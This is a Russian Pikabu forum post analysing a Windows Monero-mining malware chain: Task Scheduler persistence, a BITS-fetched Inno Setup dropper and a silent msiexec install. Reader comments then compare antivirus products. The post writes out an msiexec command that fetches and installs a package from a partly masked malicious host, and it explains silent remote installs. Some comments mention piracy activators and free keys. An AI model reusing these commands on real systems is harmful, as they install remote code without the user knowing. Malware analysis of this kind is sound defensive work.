6440

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство "мастеров", думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker'ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ - открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В автозагрузке, повторюсь всё в порядке:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология
Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

Правила сообщества

Обязательно к прочтению для авторов:

1. Если вы добавляете пост, утверждающий об утечке данных или наличии дыр в системе, предоставьте ссылку на источники или технически подкованное расследование. Посты из разряда "Какой-то банк слил данные, потому что мне звонили мошенники" будут выноситься в общую ленту.
2. Все вопросы "Как обезопасить сервер\приложение\устройство" - в лигу "Компьютер это просто".

Обязательно к прочтению для всех:

Добавление ссылки разрешено если она не содержит описание коммерческих (платных) продуктов и/или идентификаторов для отслеживания перехода и для доступа не нужен пароль или оплата в т.ч. интернет-ресурсы, каналы (от 3-х тематических видео), блоги, группы, сообщества, СМИ и т.д.


Запрещены политические holy wars.

По решению модератора или администратора сообщества пользователь будет забанен за:

1. Флуд и оскорбление пользователя, в т.ч. провокация спора, флуда, холивара (высказывание без аргументации о конкретной применимости конкретного решения в конкретной ситуации), требование уже данного ответа, распространение сведений порочащих честь и репутацию, принижающих квалификацию оппонента, переходы на личности.

2. Публикацию поста/комментария не соответствующего тематике сообщества, в том числе обсуждение администраторов и модераторов сообщества, для этого есть специальное сообщество.

3. За обвинение в киберпреступной деятельности.

4. За нарушение прочих Правил Пикабу.

Вы смотрите срез комментариев. Показать все
9
Автор поста оценил этот комментарий

Какие антивирусы с этой фигней сами справляются?

К примеру тот же Касперский может эту хреньку увидеть и уничтожить?

раскрыть ветку (51)
33
DELETED
Автор поста оценил этот комментарий

Касперский выпилил только уже загруженные файлы, после перезагрузки эта шняга пошла качаться заново. А вот забугорный от Malwarebytes (не реклама, а совет), уже добил файл и почистил планировщик заданий. Но стоит забугорный в 2 раза дороже касперского, у нас им мало кто пользуется, есть только одноразовая бесплатная демка, но она справляется.

раскрыть ветку (49)
2
Автор поста оценил этот комментарий

А ссылочку, будь ласков.

Думаю модеры не будут возбухать

раскрыть ветку (42)
23
DELETED
Автор поста оценил этот комментарий

За исполняемыми - гугл по словам "Malwarebytes", "MBAM", даже статья на вики есть: https://ru.wikipedia.org/wiki/Malwarebytes

раскрыть ветку (41)
5
Автор поста оценил этот комментарий

antimalware прога от них же и бесплатная. Не раз спасала, но не эффективна на все 100, бывали случаи когда и она не спасала.

3
Автор поста оценил этот комментарий
Спасибо нашел 81 зараженный файл, пару от мейлов, куча от днс, и еще куча от какогото zaxbara. Стоял антивирус 360. Нече не видел.
раскрыть ветку (5)
2
Автор поста оценил этот комментарий

360 это китайская поделка на базе аваста, который сам по себе на одном из последних мест по эффективности.

1
DELETED
Автор поста оценил этот комментарий

Забыл уточнить! Если есть какие-то лоадеры на винде, может их снести, потом придется из карантина восстанавливать. Антивирь расчитан под лицушную винду.

раскрыть ветку (2)
0
Автор поста оценил этот комментарий

@Kekovsky, c каспером дружит? Не начнётся анархия?

0
DELETED
Автор поста оценил этот комментарий

Зачем оно считает файл web Data зараженным?

Иллюстрация к комментарию
Автор поста оценил этот комментарий

Потому что 360 - это не антивирус, а хрень. Просто теперь вы в этом, наконец, убедились.

3
Автор поста оценил этот комментарий

Мда...

6 вредных от какого-то Microleaves...

и 324 нежелательных.

Каспер молчит сука.

раскрыть ветку (30)
9
DELETED
Автор поста оценил этот комментарий

Он даже у меня на компе 3 каких-то случайных штуки нашарил, написанных на дельфи, хотя я слежу как спецагент за своими процессами.

раскрыть ветку (27)
4
Автор поста оценил этот комментарий

Та же хрень с процессами (только вместо стандартного диспетчера юзаю Process Killer, он маленький но шустрый :D)

Иллюстрация к комментарию
раскрыть ветку (5)
0
Автор поста оценил этот комментарий

Вы их глазами отслеживаете, что ли? Поставьте менеждер процессов который будет уведомлять о добавлении в автозагрузку (во все места, включая планировщик) новых процессов. Много раз спасал, когда по глупости что-то свежескачанное и непроверенное ткнул не в песочнице.


Тот, что я использую рекламировать не буду, так как некоторые антивирусы считают его ПНП... :)

раскрыть ветку (4)
1
Автор поста оценил этот комментарий

Это очень легкий и удобный диспетчер задач, да и процессы он убивает очень быстро, к тому же если нужно - можно процесс на паузу кинуть.

А по поводу автозапуска я вовсе не парюсь, так как я в принципе знаю что устанавливаю

раскрыть ветку (3)
3
Автор поста оценил этот комментарий

Ну смотри, допустим ты скачал что-то, запустил, а тут тебе раз и уведомление, что такое-то добавилось в автозагрузку. Удалить? Оставить?

Сама прога - ещё более удобный менеджер автозагрузки, процессов, сервисов.


Можно добавить в автозагрузку (пользователю, всем пользователям), блокировать запуск и автоматически удалить файл или просто блокировать его автозагрузку. Я так убираю навязчивые сервисы от драйверов, которые один хрен после обновления загружаются сами, всякий софт, который суёт всё в автозагрузку. Ты удаляешь оттуда, а он всё равно суёт при первом запуске... Для всего этого такой менеджер прям сильно помогает.


Вдогонку скажу, что там шикарный менеджер процессов, с проверкой на virustotal и фильтрами поимени. Умеет включать/выключать службы, показывает использование ресурсов, температуру железа, в т.ч. и в трее...


Короче, нахвалил и секретничаю - вот он и подробное описание того, что он умеет. https://www.anvir.net/


Так что я попробую ваш, а вы мой.

раскрыть ветку (2)
0
Автор поста оценил этот комментарий

Что то у меня Eset заблочил его на стадии инсталляции и даже страницу кляпнул после этого))

0
Автор поста оценил этот комментарий
А я в основном все вручную выключаю когда вижу лишний процесс в диспетчере
1
Автор поста оценил этот комментарий

я закинул в карантин всю эту куеву тучу...

через пару недель прога встанет. Карантин не высыпется назад в систему?

раскрыть ветку (4)
10
DELETED
Автор поста оценил этот комментарий

Снесешь просто прогу как будет триалка заканчиваться, и всё. Если понадобится восстановить - после переустановки проги карантин по-моему даже на месте будет.

раскрыть ветку (2)
3
Автор поста оценил этот комментарий

Спасибо дружище)))

Плюсов тебе во всю карму наставил)))

1
DELETED
Автор поста оценил этот комментарий

Как обычному пользователю максимально обезопасить свой комп? Помимо малвара может стоит поставить фаервол? Или ещё чего? Может стоит целый пост запилить с рекомендациями?

1
Автор поста оценил этот комментарий

ну есть еще рутрекер на крайняк. там прога есть

0
Автор поста оценил этот комментарий

Хм..у меня при проверке Malwarebytes не нашел ничего, кроме Advanced SystemCare, которую мигом запихнул в карантин) стоит еще IObit Anti-malware, Eset и файерволл. Я наверное параноик)

0
Автор поста оценил этот комментарий

Почитал я вашу ветку и тоже решил установить этот антивирь и... пусто, даже KMS не обругал. До этого просто стандартным защитником винды пользовался. Подозрительно...

раскрыть ветку (8)
1
Автор поста оценил этот комментарий
По поводу KMS и Nod32 в последнее время молчит (хотя раньше ругался), да и KMS раньше вроде лучше был (предоставлял хоть какие то ключи)...
раскрыть ветку (7)
0
Автор поста оценил этот комментарий

Да, что-то есть такое, долго заводится, перебирает разные методы активации, но в целом работает и хрен с ним.

раскрыть ветку (6)
1
Автор поста оценил этот комментарий
Да я вот вчера пытался активировать Office 2016, а он как на зло не хотел без ключа его активировать...
раскрыть ветку (5)
0
DELETED
Автор поста оценил этот комментарий

Так ключи для retail версий он хочет, а kms активирует VL версии же

раскрыть ветку (2)
0
Автор поста оценил этот комментарий

А, с офисом я долго возился, в итоге забил и поставил 2007

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

У меня эта прога utorrent в карантин отправила, ещё попыталась очистить реестр от настроек ручного обновления браузера. Что-то какая-то сомнительная прога.

раскрыть ветку (5)
1
Автор поста оценил этот комментарий

>utorrent в карантин отправила

Так ему и надо, полагаю.

раскрыть ветку (2)
0
Автор поста оценил этот комментарий

Это почему?

раскрыть ветку (1)
3
Автор поста оценил этот комментарий

Он одно время как раз с майнерами в комплекте шел.

0
DELETED
Автор поста оценил этот комментарий
Категорически рекомендую выкинуть utorrent и поставить qbittorrent - он бесплатный, с полным функционалом, опенсорсный и без рекламы.
0
Автор поста оценил этот комментарий

справедливости ради - именно юторрент на майнинге ловили )
https://pikabu.ru/story/mayner_bitkoinov_v_posledney_versii_...

5
Автор поста оценил этот комментарий

Это показатель?

У меня DrWeb в потенциально нежелательные записывает тот софт, которым я пользуюсь. И он не вирусный. Но просто база у веба такая.

Ещё DrWeb страдал тем, что считал за ПНП файлы все файлы из установки такого софта - включая файлы переводов, текстовые и прочее. И каждый - в счётчик. Так цифры ПНП и накручиваются.

И не только DrWeb этим страдает.


Потом ПНП - это куча утилит, которые используют в недобрых целях. Типа утилит нормального шифрования, клиентов сихронизации типа  syncthing, всякие remote admin и прочего. При доступе к ПК можно настроить этот софт во зло, чем трипперописатели и пользуются. Но такой софт может быть установлен в системе самим пользователем. Но радостно отмечается как ПНП и "нашёлвирус!". Иногда в антивирусах и списка игнорирования уже нет. Не дай бог автоматом запустится "лечение" - захэкаешься восстанавливать.


Одно время антивирусы стали кидаться на старую, ещё со времён DOS утилиту командной строки. Которая текстовые файлики конвертит и валяется на винте много-много лет. Просто внезапно какую-то слишком общую сигнатуру в базы добавили и куча антивирусов стала на него ругаться. Я доставал такой же из архива, сверял побайтово - файл не менялся. А вирус появился. Причём не ПНП, а именно троян.даунлоадер что-то там.



Какой уровень эвристики включен у антивируса?

Вот эти все "я прошёл после АНТИВИРУС1 весь диск АНТИВИРУС2 и он столько понаходил..." совершенно не показательны. Тот же каспер имеет кучу настроек эвристики (того, как он будет до файлов доёбываться), вплоть до дико паронаидального. Но тогда и проверка дольше. Чтобы сравнивать антивирусы по степени находок, стоит врубать всё на максимум.


Так что лучший антивирус - это проактивная защита, закрытие дыр, какой-нибудь файрвол, софт для обнаружения нового в автозагрузке (включая планировщик), проверка свежескачанных файлов перед запуском и запуск их по первой в песочнице.

Ну и периодическая проверка файлов с livecd или из другой ОС.

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Не знаю, 331 обнаруженный файл показатель или нет, но мне показалось весьма подозрительным то, что 6 вредных от одного неизвестного производителя (которого даже и не слышал никогда), а остальные нежелательные - ещё от одного.

Таким образом насрали в системе двое.

Kms прога просто нашла, и я сам удалил до следующей активации офиса.

Официальный Касперский Тотал при этом спокойно щёлкает ебалом каждый день мониторы систему.

Вот и думаю - что же ставить на текущий год, так как Каспер срок заканчивается.

0
Автор поста оценил этот комментарий

Да, он реально хрень находит, что другие не видят.
Плюс у них на сайте есть доп. продукты, для удаления троянов/скрытой рекламы, отдельные приложения. Бесплатно.

0
Автор поста оценил этот комментарий

Спасибо

0
Автор поста оценил этот комментарий

спасибо.

сейчас попробуем дезинсекцию провести.

может что нароет.

Перестрахуемся, так сказать...

2
Автор поста оценил этот комментарий

Я одно время от Avira был в восторге (оч давно, не знаю как сейчас) - легкий и параноидальный немецкий антивирь. Был бесплатен для личного пользования, даже на дефолтных настройках - на каждый подозрительный чих орал и блокировал.

0
Автор поста оценил этот комментарий

Помню подцепил какое то говно, которое открывало рекламную страницу каждые 10 минут  браузере. Очень долго пытался вычистить его, и он, помимо всего прочего, еще и блокировал сайт Malwarebytes, а если скачать с другого устройства и перекинуть екзешник на пк, то процесс установщика вырубался сам сразу после запуска. Не помню как я его вычистил, вроде каким то антивирусом прошелся, который отрубил процессы этого вируса, после чего добил остатки с помощью Malwarebytes. Но поебался тогда знатно.

0
Автор поста оценил этот комментарий

Это норма что после его скачивания у меня винда крашнулась?)

0
Автор поста оценил этот комментарий

вот этот чувак раздает ключи бесплатно пишите в личку дай ключ в известной социальной сети szlodey2016 на малвар

Иллюстрация к комментарию
раскрыть ветку (1)
0
Автор поста оценил этот комментарий

только не злоупотребляйте) с  пониманием)

0
Автор поста оценил этот комментарий
А что можешь сказать про Eset в сравнении с другими антивирусами ? Просто мне он нравится,но хотелось бы мнение специалиста )
3
Автор поста оценил этот комментарий

Malwarebytes Antimalware, и то не всегда. Остальные просто приостанавливают процесс, чтоб он не мешал.

Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку